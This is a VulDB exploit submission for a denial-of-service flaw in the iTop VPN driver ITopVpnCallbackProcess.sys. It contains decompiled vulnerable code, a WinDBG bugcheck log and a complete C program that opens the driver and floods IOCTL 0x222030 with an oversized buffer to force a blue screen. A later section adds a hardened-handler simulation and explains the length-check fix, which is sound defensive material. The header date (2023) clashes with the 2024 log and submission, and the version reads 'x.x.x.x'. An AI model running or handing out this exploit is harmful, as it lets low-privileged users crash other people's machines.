| Title | IObit iTop VPN <= 4.0.0.1 Denial of Service |
|---|
| Description | (the submitted exploit file follows) |
|---|

/*
Exploit Title: iTop VPN "ITopVpnCallbackProcess.sys" <= x.x.x.x - Denial of Service
Date: 22/01/2023
Exploit Author: Mr Empy
Software Link: https://www.iobit.com/pt/recommend/itopvpn.php
Version: <= x.x.x.x
Tested on: Windows 10
=========================================
| DESCRIPTION |
=========================================
The version of the "ITopVpnCallbackProcess.sys" driver present in the iTop VPN product, up to version x.x.x.x, is vulnerable to a denial of service (DoS) attack due to inadequate validation of data passed via IOCTL code 0x222030.
A user with low privileges has the ability to communicate with the driver and send malicious data that is not properly validated.
When IOCTL code 0x222030 is triggered, the associated data is passed to the memmove function without proper validation, resulting in unexpected behavior. An attacker could exploit this flaw by sending specially manipulated data, leading to a denial of service on the system.
=========================================
====================================
| IMPACT |
====================================
Successful exploitation of this vulnerability can cause significant system disruption, leading to an operating system crash and resulting in the dreaded "Blue Screen of Death" (BSOD) with the error code "IRQL_NOT_LESS_OR_EQUAL". This results in temporary system unavailability, affecting the availability and reliability of the VPN service provided by iTop VPN.
====================================
=======================================
| VULN CODE |
=======================================
if (IOCTL == 0x222030) {
    destAddress = 0;
    userInput = *(void **)(param_2 + 0x18);
    if (userInput != (void *)0x0) {
        memmove(&destAddress, userInput, 4);   /* only a NULL check precedes the copy */
    }
    local_34 = (uint)(0 < destAddress);
    _DAT_1400052c0 = local_34;
    goto LAB_1400024ff;
}
=======================================
=================================
| POC |
=================================
[*] Youtube video: https://www.youtube.com/watch?v=JdQMINPVJd8
[*] WinDBG Log:
*** Fatal System Error: 0x0000000a
(0x0000000000000000,0x0000000000000002,0x0000000000000001,0xFFFFF801DD75245C)
Break instruction exception - code 80000003 (first chance)
A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.
A fatal system error has occurred.
nt!DbgBreakPointWithStatus:
fffff801`dd7da300 cc int 3
0: kd> r
rax=0000000000000000 rbx=0000000000000003 rcx=0000000000000003
rdx=000000000000008a rsi=0000000000000000 rdi=0000000000000065
rip=fffff801dd7da300 rsp=ffffd0010a981f68 rbp=ffffd0010a9820d0
r8=0000000000000065 r9=0000000000000000 r10=0000000000000000
r11=0000000000000000 r12=0000000000000003 r13=000000000000000a
r14=0000000000000000 r15=ffffe000bb764040
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
nt!DbgBreakPointWithStatus:
fffff801`dd7da300 cc int 3
0: kd> !analyze -v
Connected to Windows 10 10240 x64 target at (Mon Jan 22 22:24:43.316 2024 (UTC - 3:00)), ptr64 TRUE
[...]
IRQL_NOT_LESS_OR_EQUAL (a)
An attempt was made to access a pageable (or completely invalid) address at an
interrupt request level (IRQL) that is too high. This is usually
caused by drivers using improper addresses.
If a kernel debugger is available get the stack backtrace.
Arguments:
Arg1: 0000000000000000, memory referenced
Arg2: 0000000000000002, IRQL
Arg3: 0000000000000001, bitfield :
bit 0 : value 0 = read operation, 1 = write operation
bit 3 : value 0 = not an execute operation, 1 = execute operation (only on chips which support this level of status)
Arg4: fffff801dd75245c, address which referenced memory
[...]
STACK_TEXT:
ffffd001`0a981f68 fffff801`dd87c4a2 : 00000000`0000000a 00000000`00000003 ffffd001`0a9820d0 fffff801`dd710888 : nt!DbgBreakPointWithStatus
ffffd001`0a981f70 fffff801`dd87bdd2 : 00000000`00000003 ffffd001`0a9820d0 fffff801`dd7e1710 00000000`0000000a : nt!KiBugCheckDebugBreak+0x12
ffffd001`0a981fd0 fffff801`dd7d4d24 : 00000000`00000000 00000000`00000000 00000000`00000000 fffff801`dd9eb180 : nt!KeBugCheck2+0x93e
ffffd001`0a9826e0 fffff801`dd7df5a9 : 00000000`0000000a 00000000`00000000 00000000`00000002 00000000`00000001 : nt!KeBugCheckEx+0x104
ffffd001`0a982720 fffff801`dd7dddc8 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiBugCheckDispatch+0x69
ffffd001`0a982860 fffff801`dd75245c : 00000000`00000000 fffff800`924814b2 00000000`00000002 00000000`00000000 : nt!KiPageFault+0x248
ffffd001`0a9829f0 fffff800`92481dab : fffff800`92485300 ffffe000`bbc000f0 fffff800`92485408 00000000`00000af0 : nt!KeReleaseSemaphore+0x3c
ffffd001`0a982a80 fffff801`dd701094 : ffffe000`bd01aac0 ffffe000`bbc00da0 fffff801`dda61340 00000000`00000000 : ITopVpnCallbackProcess+0x1dab
ffffd001`0a982b00 fffff801`dd7007a9 : fffff801`dda61340 ffffe000`bb764040 fffff801`dd700fa0 fffff801`dda61340 : nt!IopProcessWorkItem+0xf4
ffffd001`0a982b70 fffff801`dd76d6d8 : ffffe000`b9e45040 00000000`00000080 fffff801`dda61340 ffffe000`bb764040 : nt!ExpWorkerThread+0xe9
ffffd001`0a982c00 fffff801`dd7d9d06 : fffff801`dd9eb180 ffffe000`bb764040 ffffe000`bb762040 00000000`00000000 : nt!PspSystemThreadStartup+0x58
ffffd001`0a982c60 00000000`00000000 : ffffd001`0a983000 ffffd001`0a97d000 00000000`00000000 00000000`00000000 : nt!KiStartSystemThread+0x16
SYMBOL_NAME: ITopVpnCallbackProcess+1dab
MODULE_NAME: ITopVpnCallbackProcess
IMAGE_NAME: ITopVpnCallbackProcess.sys
STACK_COMMAND: .cxr; .ecxr ; kb
BUCKET_ID_FUNC_OFFSET: 1dab
FAILURE_BUCKET_ID: AV_ITopVpnCallbackProcess!unknown_function
OS_VERSION: 10.0.10240.16384
BUILDLAB_STR: th1
OSPLATFORM_TYPE: x64
OSNAME: Windows 10
FAILURE_ID_HASH: {9f243435-fbaa-6dba-f4e3-9c7f63052034}
Followup: MachineOwner
=================================
*/
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#define IOCTL_CODE 0x222030
#define DRIVER_PATH L"\\\\.\\ITopVpnCallbackProcess"
VOID Exploit() {
    char payload[9999];
    /* 0x40000080 = FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL */
    HANDLE hDriver = CreateFileW(DRIVER_PATH, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0x40000080, NULL);
    if (hDriver == INVALID_HANDLE_VALUE) {
        printf("[-] The ITopVpnCallbackProcess.sys service is not activated (error %lu)\n", GetLastError());
        exit(0);
    }
    puts("[+] Handle created! [ITopVpnCallbackProcess]");
    for (int i = 0; i < 9999; i++) {
        payload[i] = 'A';
    }
    puts("[+] Payload generated!");
    puts("[*] Fuzzing Driver...");
    DWORD temp = 0;
    for (int i = 0; i < 10; i++) {
        /* Send the payload as the input buffer; no output buffer is expected. */
        DeviceIoControl(hDriver, IOCTL_CODE, payload, sizeof(payload), NULL, 0, &temp, NULL);
    }
    CloseHandle(hDriver);
    puts("Attack finished! If the machine didn't return BSOD, maybe they fixed it.");
}
int main() {
    Exploit();
    return 0;
}
| Source | https://www.youtube.com/watch?v=JdQMINPVJd8 |
|---|
| User | mrempy (UID 24379) |
|---|
| Submission | 23/01/2024 03:22 AM (2 years ago) |
|---|
| Moderation | 02/02/2024 08:17 AM (10 days later) |
|---|
| Status | Approved |
|---|
| VulDB Entry | 252685 [iTop VPN up to 4.0.0.1 IOCTL ITopVpnCallbackProcess.sys denial of service] |
|---|
| Points | 17 |
|---|
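The defensive counterpart of the VULN CODE block in the submission, as an added example that is neither the submitter's code nor the vendor's driver. It is a portable C simulation (it runs in user mode on any platform) of the check the handler should have performed: the `IoctlRequest` struct, the `SIM_*` status values and the 8-byte backing buffer are constructed for this example and do not reproduce the Windows IRP layout. The decoder uses the documented CTL_CODE bit layout (bits 0-1 method, 2-13 function, 16-31 device type), under which 0x222030 is device type 0x22, function 0x80C, method 0 (METHOD_BUFFERED); the simulation therefore assumes the pointer the handler reads is the I/O manager's copy of the caller's input, whose real length the driver must compare against the size it intends to copy.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* Constructed stand-in for what a METHOD_BUFFERED IOCTL handler receives:
   the I/O manager's kernel copy of the caller's input and its real length.
   This is NOT the Windows IRP layout; it only models the fields that matter. */
typedef struct {
    uint32_t    ioctl_code;
    const void *system_buffer;   /* plays the role of AssociatedIrp.SystemBuffer */
    size_t      input_length;    /* plays the role of InputBufferLength */
} IoctlRequest;

#define IOCTL_CODE 0x222030u

/* Simplified status values for this example (not the real NTSTATUS constants). */
enum { SIM_OK = 0, SIM_BAD_REQUEST = 1, SIM_BUFFER_TOO_SMALL = 2 };

/* CTL_CODE field layout: bits 0-1 method, 2-13 function, 14-15 access, 16-31 device type. */
uint32_t ioctl_method(uint32_t code)      { return code & 0x3u; }
uint32_t ioctl_function(uint32_t code)    { return (code >> 2) & 0xFFFu; }
uint32_t ioctl_device_type(uint32_t code) { return code >> 16; }

/* Vulnerable pattern from the advisory: a non-NULL pointer is taken as proof
   that 4 readable bytes of caller-supplied data exist. */
int vulnerable_handler(const IoctlRequest *req, int *flag_out) {
    int32_t dest = 0;
    if (req->system_buffer != NULL) {
        memmove(&dest, req->system_buffer, 4);  /* input_length is never consulted */
    }
    *flag_out = (dest > 0);
    return SIM_OK;
}

/* Hardened form: verify the control code and the supplied length before any copy. */
int hardened_handler(const IoctlRequest *req, int *flag_out) {
    if (req->ioctl_code != IOCTL_CODE)
        return SIM_BAD_REQUEST;
    if (req->system_buffer == NULL || req->input_length < sizeof(int32_t))
        return SIM_BUFFER_TOO_SMALL;
    int32_t value;
    memcpy(&value, req->system_buffer, sizeof value);
    *flag_out = (value > 0);
    return SIM_OK;
}

/* Constructed scenario: the caller supplied exactly one byte (0x00), but the
   backing allocation is larger and bytes 1..3 hold stale data, as memory behind
   a short SystemBuffer might. The flag value assumes a little-endian target. */
static const unsigned char g_backing[8] = { 0x00, 0x01, 0x00, 0x00, 0xAA, 0xAA, 0xAA, 0xAA };

int demo_vulnerable_short_input(void) {
    IoctlRequest req = { IOCTL_CODE, g_backing, 1 };
    int flag = -1;
    vulnerable_handler(&req, &flag);
    return flag;  /* 1: the decision rests on three bytes the caller never sent */
}

int demo_hardened_short_input(void) {
    IoctlRequest req = { IOCTL_CODE, g_backing, 1 };
    int flag = -1;
    return hardened_handler(&req, &flag);  /* SIM_BUFFER_TOO_SMALL, nothing copied */
}

/* Returns the flag the hardened handler computed for a well-formed 4-byte input,
   or -1 if it rejected the request. */
int demo_hardened_valid_input(int32_t value) {
    IoctlRequest req = { IOCTL_CODE, &value, sizeof value };
    int flag = -1;
    if (hardened_handler(&req, &flag) != SIM_OK) return -1;
    return flag;
}

int main(void) {
    printf("IOCTL 0x%X: device type 0x%X, function 0x%X, method %u\n", IOCTL_CODE,
           ioctl_device_type(IOCTL_CODE), ioctl_function(IOCTL_CODE), ioctl_method(IOCTL_CODE));
    printf("vulnerable handler, 1-byte input -> flag %d\n", demo_vulnerable_short_input());
    printf("hardened handler, 1-byte input  -> status %d\n", demo_hardened_short_input());
    printf("hardened handler, value 5       -> flag %d\n", demo_hardened_valid_input(5));
    return 0;
}
```

The length check is the whole fix: a METHOD_BUFFERED handler already gets a kernel copy of the input, so the only thing the caller controls is how many bytes that copy holds, and a fixed-size `memmove` from it is safe exactly when `InputBufferLength` covers that size. Rejecting short requests before the copy also gives a clean, loggable failure status instead of a decision based on whatever happened to follow the buffer.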